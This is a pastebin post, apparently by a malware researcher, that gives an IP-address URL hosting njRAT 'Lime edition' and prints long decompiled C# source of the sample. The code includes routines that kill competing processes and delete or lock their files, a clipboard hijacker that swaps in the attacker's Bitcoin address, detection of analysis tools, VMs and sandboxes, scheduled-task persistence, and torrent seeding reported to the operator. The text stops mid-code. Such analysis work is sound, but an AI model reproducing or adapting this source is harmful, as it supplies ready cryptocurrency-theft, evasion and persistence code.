From pastebin
Interesting to see inner workings
http://pastebin.com/raw/1PZLxaXx
http://46.101.104.141/klep/ hosts #njrat #lime edition as reported by @FewAtoms and @James_inthe_box Opening up http://46.101.104.141/klep/uk.exe in Ilspy gives the following decompiled code ------------- // BotKillers using j; using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using My; using System; using System.Collections; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security.AccessControl; using System.Security.Principal; using System.Threading; using System.Windows.Forms; [StandardModule] internal sealed class BotKillers { public enum ThreadAccess { DIRECT_IMPERSONATION = 0x200, GET_CONTEXT = 8, IMPERSONATE = 0x100, QUERY_INFORMATION = 0x40, SET_CONTEXT = 0x10, SET_INFORMATION = 0x20, SET_THREAD_TOKEN = 0x80, SUSPEND_RESUME = 2, TERMINATE = 1 } public enum WinTrustDataUIChoice : uint { All = 1u, None, NoBad, NoGood } public enum WinTrustDataRevocationChecks : uint { None, WholeChain } public enum WinTrustDataChoice : uint { File = 1u, Catalog, Blob, Signer, Certificate } public enum WinTrustDataStateAction : uint { Ignore, Verify, Close, AutoCache, AutoCacheFlush } [Flags] public enum WinTrustDataProvFlags : uint { UseIe4TrustFlag = 1u, NoIe4ChainFlag = 2u, NoPolicyUsageFlag = 4u, RevocationCheckNone = 0x10, RevocationCheckEndCert = 0x20, RevocationCheckChain = 0x40, RevocationCheckChainExcludeRoot = 0x80, SaferFlag = 0x100, HashOnlyFlag = 0x200, UseDefaultOsverCheck = 0x400, LifetimeSigningFlag = 0x800, CacheOnlyUrlRetrieval = 0x1000 } public enum WinTrustDataUIContext : uint { Execute, Install } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public class WinTrustFileInfo { private int StructSize; private IntPtr pszFilePath; private IntPtr hFile; private IntPtr pgKnownSubject; public WinTrustFileInfo(string _filePath) { this.StructSize = Marshal.SizeOf(typeof(WinTrustFileInfo)); this.hFile = IntPtr.Zero; this.pgKnownSubject = IntPtr.Zero; this.pszFilePath = Marshal.StringToCoTaskMemAuto(_filePath); } ~WinTrustFileInfo() { Marshal.FreeCoTaskMem(this.pszFilePath); } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public class WinTrustData { private int StructSize; private IntPtr PolicyCallbackData; private IntPtr SIPClientData; private WinTrustDataUIChoice UIChoice; private WinTrustDataRevocationChecks RevocationChecks; private WinTrustDataChoice UnionChoice; private IntPtr FileInfoPtr; private WinTrustDataStateAction StateAction; private IntPtr StateData; private string URLReference; private WinTrustDataProvFlags ProvFlags; private WinTrustDataUIContext UIContext; public WinTrustData(string _fileName) { this.StructSize = Marshal.SizeOf(typeof(WinTrustData)); this.PolicyCallbackData = IntPtr.Zero; this.SIPClientData = IntPtr.Zero; this.UIChoice = WinTrustDataUIChoice.None; this.RevocationChecks = WinTrustDataRevocationChecks.None; this.UnionChoice = WinTrustDataChoice.File; this.StateAction = WinTrustDataStateAction.Ignore; this.StateData = IntPtr.Zero; this.URLReference = null; this.ProvFlags = WinTrustDataProvFlags.SaferFlag; this.UIContext = WinTrustDataUIContext.Execute; WinTrustFileInfo structure = new WinTrustFileInfo(_fileName); this.FileInfoPtr = Marshal.AllocCoTaskMem(Marshal.SizeOf(typeof(WinTrustFileInfo))); Marshal.StructureToPtr(structure, this.FileInfoPtr, false); } ~WinTrustData() { Marshal.FreeCoTaskMem(this.FileInfoPtr); } } public enum WinVerifyTrustResult { Success, ProviderUnknown = -2146762751, ActionUnknown, SubjectFormUnknown, SubjectNotTrusted } public sealed class WinTrust { private static readonly IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1); private const string WINTRUST_ACTION_GENERIC_VERIFY_V2 = "{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}"; [DllImport("wintrust.dll", CharSet = CharSet.Unicode, ExactSpelling = true)] private static extern WinVerifyTrustResult WinVerifyTrust([In] IntPtr hwnd, [In] [MarshalAs(UnmanagedType.LPStruct)] Guid pgActionID, [In] WinTrustData pWVTData); public static bool VerifyEmbeddedSignature(string fileName) { try { WinTrustData pWVTData = new WinTrustData(fileName); Guid pgActionID = new Guid("{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}"); WinVerifyTrustResult winVerifyTrustResult = WinTrust.WinVerifyTrust(WinTrust.INVALID_HANDLE_VALUE, pgActionID, pWVTData); return winVerifyTrustResult == WinVerifyTrustResult.Success; } catch (Exception projectError) { ProjectData.SetProjectError(projectError); bool result = false; ProjectData.ClearProjectError(); return result; } } private WinTrust() { } } private static int ProccessKilled = 0; private static int Startupkilled = 0; private static string hio; [DllImport("user32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool IsWindowVisible(IntPtr hWnd); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr FindWindow(string lpClassName, string lpWindowName); public static void RunStandardBotKiller() { int num = default(int); int num3 = default(int); try { goto IL_0002; IL_0002: ProjectData.ClearProjectError(); num = -2; goto IL_000b; IL_000b: int num2 = 2; Interaction.Shell("TASKKILL /F /IM wscript.exe", AppWinStyle.Hide, false, -1); goto IL_001b; IL_001b: num2 = 3; Interaction.Shell("TASKKILL /F /IM cmd.exe", AppWinStyle.Hide, false, -1); goto IL_002b; IL_002b: num2 = 4; BotKillers.ScanProcess(); goto IL_0033; IL_0033: num2 = 5; BotKillers.RunStartupKiller(); goto IL_003b; IL_003b: num2 = 6; BotKillers.ProccessKilled = 0; goto IL_0043; IL_0043: num2 = 7; BotKillers.Startupkilled = 0; goto end_IL_0001; IL_004d: int num4 = num3 + 1; num3 = 0; switch (num4) { case 8: goto end_IL_0001; case 1: goto IL_0002; case 2: goto IL_000b; case 3: goto IL_001b; case 4: goto IL_002b; case 5: goto IL_0033; case 6: goto IL_003b; case 7: goto IL_0043; default: goto IL_00b7; } IL_007d: num3 = num2; if (num > -2) { goto IL_0087; } goto IL_0084; IL_0084: int num5 = 1; goto IL_0088; IL_0087: num5 = num; goto IL_0088; IL_0088: switch (num5) { case 1: goto IL_004d; default: goto IL_00b7; } end_IL_0001:; } catch (object obj) when (obj is Exception & num != 0 & num3 == 0) { ProjectData.SetProjectError((Exception)obj); /*Error near IL_00b5: Could not find block for branch target IL_007d*/; } if (num3 != 0) { ProjectData.ClearProjectError(); } return; IL_00b7: throw ProjectData.CreateProjectError(-2146828237); } public static void ScanProcess() { checked { try { Process[] processes = Process.GetProcesses(); int num = processes.Length - 1; for (int i = 0; i <= num; i++) { Process process = processes[i]; try { string fullPath = Path.GetFullPath(process.MainModule.FileName); if (BotKillers.IsFileMalicious(fullPath) && !BotKillers.WindowIsVisible(process.MainWindowTitle)) { BotKillers.TerminateProcess(process.Id); BotKillers.DestroyFile(fullPath); BotKillers.ProccessKilled++; } } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } } catch (Exception projectError2) { ProjectData.SetProjectError(projectError2); ProjectData.ClearProjectError(); } } } public static bool IsFileMalicious(string fileloc) { bool result; int num = default(int); int num3 = default(int); try { goto IL_0002; IL_0002: ProjectData.ClearProjectError(); num = -2; goto IL_000b; IL_000b: int num2 = 2; if (fileloc.Contains(Application.ExecutablePath)) { goto IL_001e; } goto IL_0029; IL_001e: num2 = 3; result = false; goto end_IL_0001; IL_0029: num2 = 5; if (fileloc.ToLower().Contains("malware")) { goto IL_0041; } goto IL_004c; IL_0041: num2 = 6; BotKillers.DestroyFile(fileloc); goto IL_004c; IL_004c: num2 = 8; if (fileloc.Contains("Google.com")) { goto IL_005f; } goto IL_006b; IL_005f: num2 = 9; result = false; goto end_IL_0001; IL_006b: num2 = 11; if (fileloc.Contains("Microsoft.com")) { goto IL_007f; } goto IL_008b; IL_007f: num2 = 12; result = false; goto end_IL_0001; IL_008b: num2 = 14; if (fileloc.Contains("cmd")) { goto IL_009f; } goto IL_00ab; IL_009f: num2 = 15; result = true; goto end_IL_0001; IL_00ab: num2 = 17; if (fileloc.Contains("wscript")) { goto IL_00bf; } goto IL_00cb; IL_00bf: num2 = 18; result = true; goto end_IL_0001; IL_00cb: num2 = 20; if (fileloc.Contains(RuntimeEnvironment.GetRuntimeDirectory())) { goto IL_00df; } goto IL_00eb; IL_00df: num2 = 21; result = true; goto end_IL_0001; IL_00eb: num2 = 23; if (WinTrust.VerifyEmbeddedSignature(fileloc)) { goto IL_00fa; } goto IL_0103; IL_00fa: num2 = 24; result = false; goto end_IL_0001; IL_0103: num2 = 26; if (fileloc.Contains(Environment.GetEnvironmentVariable("USERPROFILE")) | fileloc.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) { goto IL_012a; } goto IL_0133; IL_012a: num2 = 27; result = true; goto end_IL_0001; IL_0133: num2 = 29; FileAttributes attributes = File.GetAttributes(fileloc); goto IL_013e; IL_013e: num2 = 30; if ((attributes & FileAttributes.System) == FileAttributes.System) { goto IL_014e; } goto IL_0157; IL_014e: num2 = 31; result = true; goto end_IL_0001; IL_0157: num2 = 33; if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden) { goto IL_0167; } goto IL_0170; IL_0167: num2 = 34; result = true; goto end_IL_0001; IL_0170: num2 = 36; result = false; goto end_IL_0001; IL_017c: int num4 = num3 + 1; num3 = 0; switch (num4) { case 37: goto end_IL_0001; case 1: goto IL_0002; case 2: goto IL_000b; case 3: goto IL_001e; case 4: case 5: goto IL_0029; case 6: goto IL_0041; case 7: case 8: goto IL_004c; case 9: goto IL_005f; case 10: case 11: goto IL_006b; case 12: goto IL_007f; case 13: case 14: goto IL_008b; case 15: goto IL_009f; case 16: case 17: goto IL_00ab; case 18: goto IL_00bf; case 19: case 20: goto IL_00cb; case 21: goto IL_00df; case 22: case 23: goto IL_00eb; case 24: goto IL_00fa; case 25: case 26: goto IL_0103; case 27: goto IL_012a; case 28: case 29: goto IL_0133; case 30: goto IL_013e; case 31: goto IL_014e; case 32: case 33: goto IL_0157; case 34: goto IL_0167; case 35: case 36: goto IL_0170; default: goto IL_025a; } IL_0220: num3 = num2; if (num > -2) { goto IL_022a; } goto IL_0227; IL_0227: int num5 = 1; goto IL_022b; IL_022a: num5 = num; goto IL_022b; IL_022b: switch (num5) { case 1: goto IL_017c; default: goto IL_025a; } end_IL_0001:; } catch (object obj) when (obj is Exception & num != 0 & num3 == 0) { ProjectData.SetProjectError((Exception)obj); /*Error near IL_0258: Could not find block for branch target IL_0220*/; } if (num3 != 0) { ProjectData.ClearProjectError(); } return result; IL_025a: throw ProjectData.CreateProjectError(-2146828237); } public static void KillFile(string location) { try { DirectoryInfo directoryInfo = new DirectoryInfo(location); DirectorySecurity directorySecurity = new DirectorySecurity(); directorySecurity.SetAccessRuleProtection(true, false); directoryInfo.SetAccessControl(directorySecurity); } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } public static bool WindowIsVisible(string WinTitle) { try { IntPtr hWnd = BotKillers.FindWindow(null, WinTitle); return BotKillers.IsWindowVisible(hWnd); } catch (Exception projectError) { ProjectData.SetProjectError(projectError); bool result = false; ProjectData.ClearProjectError(); return result; } } public static void RunStartupKiller() { int num = default(int); int num4 = default(int); try { goto IL_0002; IL_0002: ProjectData.ClearProjectError(); num = -2; goto IL_000b; IL_000b: int num2 = 2; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 1); goto IL_0019; IL_0019: num2 = 3; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 1); goto IL_0027; IL_0027: num2 = 4; if (BotKillers.IsAdmin()) { goto IL_0034; } goto IL_0052; IL_0034: num2 = 5; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 2); goto IL_0042; IL_0042: num2 = 6; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 2); goto IL_0052; IL_0052: num2 = 8; string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG); goto IL_006f; IL_006f: num2 = 9; IEnumerator<string> enumerator; for (enumerator = MyProject.Computer.FileSystem.GetFiles(MyProject.Computer.FileSystem.SpecialDirectories.Programs + "\\Startup").GetEnumerator(); enumerator.MoveNext(); num2 = 17) { string current = enumerator.Current; goto IL_00b4; IL_01b8: int num3 = num; goto IL_01b9; IL_00b4: num2 = 10; if (!current.Contains(OK.RG) & !current.Contains(fileNameWithoutExtension + ".url") & !current.Contains(".ini")) { goto IL_00f2; } continue; IL_00f2: num2 = 11; BotKillers.DestroyFile(current); goto IL_00fd; IL_00fd: num2 = 12; Thread.Sleep(50); goto IL_0108; IL_0108: num2 = 13; BotKillers.DestroyFile(current); goto IL_0113; IL_0113: num2 = 14; Thread.Sleep(50); goto IL_011e; IL_011e: num2 = 15; BotKillers.DestroyFile(current); continue; IL_0152: int num5 = num4 + 1; num4 = 0; switch (num5) { case 19: goto end_IL_0001; case 1: goto IL_0002; case 2: goto IL_000b; case 3: goto IL_0019; case 4: goto IL_0027; case 5: goto IL_0034; case 6: goto IL_0042; case 7: case 8: goto IL_0052; case 9: goto IL_006f; case 10: goto IL_00b4; case 11: goto IL_00f2; case 12: goto IL_00fd; case 13: goto IL_0108; case 14: goto IL_0113; case 15: goto IL_011e; case 16: case 17: continue; case 18: goto end_IL_012e; default: goto IL_01e8; } IL_01b9: switch (num3) { case 1: goto IL_0152; default: goto IL_01e8; } IL_01b5: num3 = 1; goto IL_01b9; IL_01ae: num4 = num2; if (num > -2) { goto IL_01b8; } goto IL_01b5; continue; end_IL_012e: break; } num2 = 18; enumerator?.Dispose(); end_IL_0001:; } catch (object obj) when (obj is Exception & num != 0 & num4 == 0) { ProjectData.SetProjectError((Exception)obj); /*Error near IL_01e6: Could not find block for branch target IL_01ae*/; } if (num4 != 0) { ProjectData.ClearProjectError(); } return; IL_01e8: throw ProjectData.CreateProjectError(-2146828237); } public static void StartupFucker(string regkey, int type) { try { RegistryKey registryKey = default(RegistryKey); if (type == 1) { registryKey = Registry.CurrentUser.OpenSubKey(regkey); } if (type == 2) { registryKey = Registry.LocalMachine.OpenSubKey(regkey); } string[] valueNames = registryKey.GetValueNames(); foreach (string text in valueNames) { try { string text2 = registryKey.GetValue(text).ToString(); if (text2.Contains("-")) { if (text2.Contains("\"")) { text2.Replace("\"", string.Empty); } try { string[] array = Strings.Split(text2, " -", -1, CompareMethod.Binary); text2 = array[0]; } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } if (text2.Contains("\"")) { object[] array2 = text2.Split('"'); text2 = Conversions.ToString(array2[1]); } if (!text2.Contains(Application.ExecutablePath)) { BotKillers.RemoveKey(type, text, regkey, text2); if (!WinTrust.VerifyEmbeddedSignature(text2)) { BotKillers.TerminateProcessPath(text2); BotKillers.DestroyFile(text2); } } } catch (Exception projectError2) { ProjectData.SetProjectError(projectError2); ProjectData.ClearProjectError(); } } } catch (Exception projectError3) { ProjectData.SetProjectError(projectError3); ProjectData.ClearProjectError(); } } public static void RemoveKey(int Reg, string file, string reglocation, string FileLocation) { try { RegistryKey registryKey = null; registryKey = ((Reg != 1) ? Registry.LocalMachine.OpenSubKey(reglocation, true) : Registry.CurrentUser.OpenSubKey(reglocation, true)); using (registryKey) { registryKey?.DeleteValue(file); } } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public static void DestroyFile(string path) { try { if (File.Exists(path)) { Random random = new Random(); try { BotKillers.AllowAccess(path); MyProject.Computer.FileSystem.MoveFile(path, Path.GetTempPath() + Conversions.ToString(random.Next(10000, 90000))); File.WriteAllText(path, string.Empty); FileSystem.FileOpen(FileSystem.FreeFile(), path, OpenMode.Input, OpenAccess.Default, OpenShare.LockReadWrite, -1); BotKillers.KillFile(path); } catch (Exception projectError) { ProjectData.SetProjectError(projectError); DirectoryInfo directoryInfo = new DirectoryInfo(path); DirectorySecurity directorySecurity = new DirectorySecurity(); directorySecurity.SetAccessRuleProtection(true, false); directoryInfo.SetAccessControl(directorySecurity); ProjectData.ClearProjectError(); } } } catch (Exception projectError2) { ProjectData.SetProjectError(projectError2); ProjectData.ClearProjectError(); } } public static bool IsAdmin() { try { WindowsIdentity current = WindowsIdentity.GetCurrent(); WindowsPrincipal windowsPrincipal = new WindowsPrincipal(current); return windowsPrincipal.IsInRole(WindowsBuiltInRole.Administrator); } catch (Exception projectError) { ProjectData.SetProjectError(projectError); bool result = false; ProjectData.ClearProjectError(); return result; } } public static void AllowAccess(string location) { try { DirectoryInfo directoryInfo = new DirectoryInfo(location); DirectorySecurity directorySecurity = new DirectorySecurity(); directorySecurity.SetAccessRuleProtection(false, true); directoryInfo.SetAccessControl(directorySecurity); } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } public static void TerminateProcessPath(string Path) { checked { try { if (!Path.Contains(Process.GetCurrentProcess().ProcessName.ToString())) { if (Path.Contains("\\")) { string[] array = Strings.Split(Path, "\\", -1, CompareMethod.Binary); string[] array2 = array; foreach (string text in array2) { if (text.Contains(".exe")) { Path = text; } } } if (Path.Contains(".exe")) { Path = Path.Replace(".exe", string.Empty); } Process[] processes = Process.GetProcesses(); int num = processes.Length - 1; for (int j = 0; j <= num; j++) { Process process = processes[j]; if (process.ProcessName.Contains(Path)) { BotKillers.TerminateProcess(process.Id); } } } } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } } public static void TerminateProcess(int PID) { try { Process processById = Process.GetProcessById(PID); if (Operators.CompareString(processById.ProcessName, string.Empty, false) != 0) { IEnumerator enumerator = default(IEnumerator); try { enumerator = processById.Threads.GetEnumerator(); while (enumerator.MoveNext()) { ProcessThread processThread = (ProcessThread)enumerator.Current; IntPtr intPtr = BotKillers.OpenThread((ThreadAccess)3, true, checked((uint)processThread.Id)); if (intPtr != IntPtr.Zero) { BotKillers.SuspendThread(intPtr); BotKillers.TerminateThread(intPtr, 1u); BotKillers.CloseHandle(intPtr); } } } finally { if (enumerator is IDisposable) { (enumerator as IDisposable).Dispose(); } } } } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } [DllImport("kernel32.dll", SetLastError = true)] private static extern bool CloseHandle(IntPtr hHandle); [DllImport("kernel32.dll")] private static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId); [DllImport("kernel32.dll", SetLastError = true)] public static extern int SuspendThread(IntPtr hThread); [DllImport("kernel32.dll")] private static extern bool TerminateThread(IntPtr hThread, uint dwExitCode); } // CallEveryXSeconds using j; using Microsoft.VisualBasic.CompilerServices; using System; using System.Diagnostics; using System.Runtime.CompilerServices; using System.Threading; using System.Timers; using System.Windows.Forms; public class CallEveryXSeconds { [Serializable] [CompilerGenerated] internal sealed class _Closure$__ { public static readonly _Closure$__ $I; public static ParameterizedThreadStart $IR2-1; static _Closure$__() { _Closure$__.$I = new _Closure$__(); } [DebuggerHidden] internal void _Lambda$__R2-1(object a0) { Clipboard.SetText(Conversions.ToString(a0)); } } private static System.Timers.Timer Timer; private static OK N = new OK(); public static void Handler(object sender, ElapsedEventArgs e) { Process[] processes = Process.GetProcesses(); Process[] array = processes; foreach (Process process in array) { if (process.MainWindowTitle.ToLower().Contains("BITCOIN".ToLower())) { try { Thread thread = new Thread((_Closure$__.$IR2-1 == null) ? (_Closure$__.$IR2-1 = delegate(object a0) { Clipboard.SetText(Conversions.ToString(a0)); }) : _Closure$__.$IR2-1); thread.SetApartmentState(ApartmentState.STA); thread.Start(OK.BTC_ADD); } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } } } public static void Start() { CallEveryXSeconds.Timer = new System.Timers.Timer(1000.0); CallEveryXSeconds.Timer.Elapsed += CallEveryXSeconds.Handler; CallEveryXSeconds.Timer.Enabled = true; } public static void stopme() { CallEveryXSeconds.Timer.Elapsed += CallEveryXSeconds.Handler; CallEveryXSeconds.Timer.Stop(); } } // MyAntiProcess using j; using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using System.Diagnostics; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Timers; using System.Windows.Forms; public class MyAntiProcess { private static System.Timers.Timer Timer; private static OK N = new OK(); [DllImport("kernel32", CharSet = CharSet.Ansi, EntryPoint = "GetModuleHandleA", ExactSpelling = true, SetLastError = true)] private static extern long GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpModuleName); [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public static void Handler(object sender, ElapsedEventArgs e) { Process[] processes = Process.GetProcesses(); Process[] array = processes; foreach (Process process in array) { if (process.MainWindowTitle.Contains("Process Hacker") | process.MainWindowTitle.Contains("Process Explorer")) { ProjectData.EndApp(); } } Process[] processesByName = Process.GetProcessesByName("dnSpy"); foreach (Process process2 in processesByName) { ProjectData.EndApp(); } Process[] processesByName2 = Process.GetProcessesByName("CodeReflect"); foreach (Process process3 in processesByName2) { ProjectData.EndApp(); } Process[] processesByName3 = Process.GetProcessesByName("Reflector"); foreach (Process process4 in processesByName3) { ProjectData.EndApp(); } Process[] processesByName4 = Process.GetProcessesByName("ILSpy"); foreach (Process process5 in processesByName4) { ProjectData.EndApp(); } Process[] processesByName5 = Process.GetProcessesByName("VGAuthService"); foreach (Process process6 in processesByName5) { ProjectData.EndApp(); } Process[] processesByName6 = Process.GetProcessesByName("VBoxService"); foreach (Process process7 in processesByName6) { ProjectData.EndApp(); } Process[] processesByName7 = Process.GetProcessesByName("Sandboxie Control"); foreach (Process process8 in processesByName7) { ProjectData.EndApp(); } Process[] processesByName8 = Process.GetProcessesByName("IPBlocker"); foreach (Process process9 in processesByName8) { ProjectData.EndApp(); } Process[] processesByName9 = Process.GetProcessesByName("TiGeR-Firewall"); foreach (Process process10 in processesByName9) { ProjectData.EndApp(); } Process[] processesByName10 = Process.GetProcessesByName("smsniff"); foreach (Process process11 in processesByName10) { ProjectData.EndApp(); } Process[] processesByName11 = Process.GetProcessesByName("exeinfoPE"); foreach (Process process12 in processesByName11) { ProjectData.EndApp(); } Process[] processesByName12 = Process.GetProcessesByName("NetSnifferCs"); foreach (Process process13 in processesByName12) { ProjectData.EndApp(); } Process[] processesByName13 = Process.GetProcessesByName("wireshark"); foreach (Process process14 in processesByName13) { ProjectData.EndApp(); } Process[] processesByName14 = Process.GetProcessesByName("apateDNS"); foreach (Process process15 in processesByName14) { ProjectData.EndApp(); } Process[] processesByName15 = Process.GetProcessesByName("SbieCtrl"); foreach (Process process16 in processesByName15) { ProjectData.EndApp(); } Process[] processesByName16 = Process.GetProcessesByName("SpyTheSpy"); foreach (Process process17 in processesByName16) { ProjectData.EndApp(); } } public static void Start() { MyAntiProcess.Timer = new System.Timers.Timer(1000.0); MyAntiProcess.Timer.Elapsed += MyAntiProcess.Handler; MyAntiProcess.Timer.Enabled = true; } public static void stopme() { MyAntiProcess.Timer.Elapsed += MyAntiProcess.Handler; MyAntiProcess.Timer.Stop(); } public static void AutoAnti() { object executablePath = Application.ExecutablePath; Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject("schtasks /create /tn NYAN /tr \"", executablePath), "\" /sc minute /mo 1")), AppWinStyle.Hide, false, -1); } public static void XAnti() { object executablePath = Application.ExecutablePath; Interaction.Shell("schtasks /Delete /tn NYAN /F", AppWinStyle.Hide, false, -1); } } // Torrent using j; using Microsoft.VisualBasic.CompilerServices; using System; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; using System.Threading; [StandardModule] internal sealed class Torrent { public static string UTorrentLocalPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\uTorrent\\uTorrent.exe"; public static string BitLocalPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BitTorrent\\BitTorrent.exe"; [DllImport("user32.dll")] private static extern int ShowWindow(int hwnd, int nCmdShow); public static void SeedTorrent(string path) { int num = default(int); int num3 = default(int); try { goto IL_0002; IL_0002: ProjectData.ClearProjectError(); num = -2; goto IL_000b; IL_000b: int num2 = 2; if (Torrent.IsBitTorrent()) { goto IL_0016; } goto IL_0048; IL_0016: num2 = 3; Torrent.SeedIt(Torrent.BitLocalPath, Torrent.BitLocalPath, path); goto IL_0029; IL_0029: num2 = 4; OK.Send("MSG" + OK.Y + "Seeding with BitTorrent"); goto end_IL_0001; IL_0048: num2 = 6; if (Torrent.IsUtorrent()) { goto IL_0055; } goto IL_0088; IL_0055: num2 = 7; Torrent.SeedIt(Torrent.UTorrentLocalPath, Torrent.UTorrentLocalPath, path); goto IL_0068; IL_0068: num2 = 8; OK.Send("MSG" + OK.Y + "Seeding with uTorrent"); goto end_IL_0001; IL_0088: num2 = 10; OK.Send("MSG" + OK.Y + "No Torrent Software Installed"); goto end_IL_0001; IL_00ab: int num4 = num3 + 1; num3 = 0; switch (num4) { case 5: goto end_IL_0001; case 9: goto end_IL_0001; case 11: goto end_IL_0001; case 12: goto end_IL_0001; case 1: goto IL_0002; case 2: goto IL_000b; case 3: goto IL_0016; case 4: goto IL_0029; case 6: goto IL_0048; case 7: goto IL_0055; case 8: goto IL_0068; case 10: goto IL_0088; default: goto IL_0125; } IL_00eb: num3 = num2; if (num > -2) { goto IL_00f5; } goto IL_00f2; IL_00f2: int num5 = 1; goto IL_00f6; IL_00f5: num5 = num; goto IL_00f6; IL_00f6: switch (num5) { case 1: goto IL_00ab; default: goto IL_0125; } end_IL_0001:; } catch (object obj) when (obj is Exception & num != 0 & num3 == 0) { ProjectData.SetProjectError((Exception)obj); /*Error near IL_0123: Could not find block for branch target IL_00eb*/; } if (num3 != 0) { ProjectData.ClearProjectError(); } return; IL_0125: throw ProjectData.CreateProjectError(-2146828237); } public static string GetFileNameFromURL(string URL) { try { return URL.Substring(checked(URL.LastIndexOf("/", StringComparison.Ordinal) + 1)); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.ClearProjectError(); return URL; } } public static bool IsUtorrent() { bool result; int num = default(int); int num3 = default(int); try { goto IL_0002; IL_0002: ProjectData.ClearProjectError(); num = -2; goto IL_000b; IL_000b: int num2 = 2; if (File.Exists(Torrent.UTorrentLocalPath)) { goto IL_001d; } goto IL_0025; IL_001d: num2 = 3; result = true; goto end_IL_0001; IL_0025: num2 = 5; result = false; goto end_IL_0001; IL_002d: int num4 = num3 + 1; num3 = 0; switch (num4) { case 6: goto end_IL_0001; case 1: goto IL_0002; case 2: goto IL_000b; case 3: goto IL_001d; case 4: case 5: goto IL_0025; default: goto IL_008f; } IL_0055: num3 = num2; if (num > -2) { goto IL_005f; } goto IL_005c; IL_005c: int num5 = 1; goto IL_0060; IL_005f: num5 = num; goto IL_0060; IL_0060: switch (num5) { case 1: goto IL_002d; default: goto IL_008f; } end_IL_0001:; } catch (object obj) when (obj is Exception & num != 0 & num3 == 0) { ProjectData.SetProjectError((Exception)obj); /*Error near IL_008d: Could not find block for branch target IL_0055*/; } if (num3 != 0) { ProjectData.ClearProjectError(); } return result; IL_008f: throw ProjectData.CreateProjectError(-2146828237); } public static bool IsBitTorrent() { if (File.Exists(Torrent.BitLocalPath)) { return true; } return false; } public static void SeedIt(string ClientPath, string LocalPath, string TorrentPath) { int num = default(int); int num3 = default(int); try { goto IL_0002; IL_0002: ProjectData.ClearProjectError(); num = -2; goto IL_000b; IL_000b: int num2 = 2; ProcessStartInfo processStartInfo = new ProcessStartInfo(); goto IL_0013; IL_0013: num2 = 3; processStartInfo.FileName = ClientPath; goto IL_001d; IL_001d: num2 = 4; processStartInfo.Arguments = "/" + LocalPath + " \"" + TorrentPath + "\""; goto IL_0051; IL_0051: num2 = 5; processStartInfo.CreateNoWindow = true; goto IL_005b; IL_005b: num2 = 6; processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; goto IL_0065; IL_0065: num2 = 7; processStartInfo.ErrorDialog = false; goto IL_006f; IL_006f: num2 = 8; Process.GetProcessesByName("BitTorrent")[0].Kill(); goto IL_0083; IL_0083: num2 = 9; Process.GetProcessesByName("uTorrent")[0].Kill(); goto IL_0098; IL_0098: num2 = 10; Process process = Process.Start(processStartInfo); goto IL_00a3; IL_00a3: num2 = 11; if (ClientPath.Contains("uTorrent")) { goto IL_00b7; } goto IL_00c8; IL_00b7: num2 = 12; Torrent.HideIt("uTorrent"); goto end_IL_0001; IL_00c8: num2 = 14; if (ClientPath.Contains("BitTorrent")) { goto IL_00dc; } goto end_IL_0001; IL_00dc: num2 = 15; Torrent.HideIt("BitTorrent"); goto end_IL_0001; IL_00f0: int num4 = num3 + 1; num3 = 0; switch (num4) { case 13: goto end_IL_0001; case 16: goto end_IL_0001; case 17: goto end_IL_0001; case 1: goto IL_0002; case 2: goto IL_000b; case 3: goto IL_0013; case 4: goto IL_001d; case 5: goto IL_0051; case 6: goto IL_005b; case 7: goto IL_0065; case 8: goto IL_006f; case 9: goto IL_0083; case 10: goto IL_0098; case 11: goto IL_00a3; case 12: goto IL_00b7; case 14: goto IL_00c8; case 15: goto IL_00dc; default: goto IL_017e; } IL_0144: num3 = num2; if (num > -2) { goto IL_014e; } goto IL_014b; IL_014b: int num5 = 1; goto IL_014f; IL_014e: num5 = num; goto IL_014f; IL_014f: switch (num5) { case 1: goto IL_00f0; default: goto IL_017e; } end_IL_0001:; } catch (object obj) when (obj is Exception & num != 0 & num3 == 0) { ProjectData.SetProjectError((Exception)obj); /*Error near IL_017c: Could not find block for branch target 